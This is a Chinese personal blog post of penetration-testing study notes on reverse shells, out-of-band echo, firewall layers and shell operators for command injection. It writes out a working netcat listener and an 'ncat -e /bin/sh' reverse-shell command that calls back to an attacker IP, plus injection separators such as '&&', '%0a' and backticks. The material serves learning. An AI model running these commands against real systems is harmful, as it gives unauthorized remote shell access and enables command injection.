一、反弹shell

正反向连接不用过于在意,目的都是权限移交,绕过防火墙
ncat是nmap升级版,支持ssl

反向连接反弹shell,适用于
(1)目标在内网,攻击者在外网(如渗透企业内网服务器)
(2)防火墙仅允许出站流量(目标可访问外网,但外网无法访问内网)。

攻击者(外网机器)监听

nc -lvvp 5566      # 本地Windows/Linux均可

目标(内网Linux)主动连接

ncat -e /bin/sh 10.80.11.86 5566    # 10.80.11.86是攻击者公网IP

相关参数

  • -l:监听模式(Listen)。
  • -v:详细输出(Verbose)。
  • -v:重复使用(两次-v更详细)。
  • -p:指定端口(Port)。
  • -e:绑定可执行程序(Execute),如cmd.exe/bin/sh

二、数据回显

无回显情况下,使用查询带外OOB技术,ping带外

三、防火墙策略与绕过

过滤层级

  • 传输层防火墙:基于TCP/UDP端口过滤(如阻止入站22端口)。
  • 应用层防火墙:深度检测HTTP内容(如WAF)。
  • 网络层防火墙:基于IP/ICMP过滤(较少见,因ICMP需用于网络诊断)。

四、管道符与逻辑运算符

管道符:| 管道符 || 逻辑或 && 逻辑与 &后台任务符号

Windows:

| (管道符):将前一个命令的输出作为后一个命令的输入。dir | findstr "secret"

|| (逻辑或):前一个命令执行失败(返回非零退出码)才执行后一个命令。nonexistentcmd || whoami。

& (后台任务符号/命令分隔符):顺序执行多个命令,无论前一个成功与否。dir & whoami。

&& (逻辑与):前一个命令执行成功(返回零退出码)才执行后一个命令。ping 127.0.0.1 && whoami。

%0a (换行符URL编码) 也常用于分隔命令。

Linux:多出来两个

; (命令分隔符):顺序执行命令,无论前一个成功与否。ls; whoami。

`` (反引号): 执行反引号内的命令,并将其输出替换到原命令位置。
ls `whoami` (会尝试列出以当前用户名为名的文件/目录)。

小结

失败和迷茫才是常态

欢迎来访 这是我的小窝~ 网安弱鸡 健身屌丝 好不容易搭出来的 大佬略过我
最后更新于 2025-07-31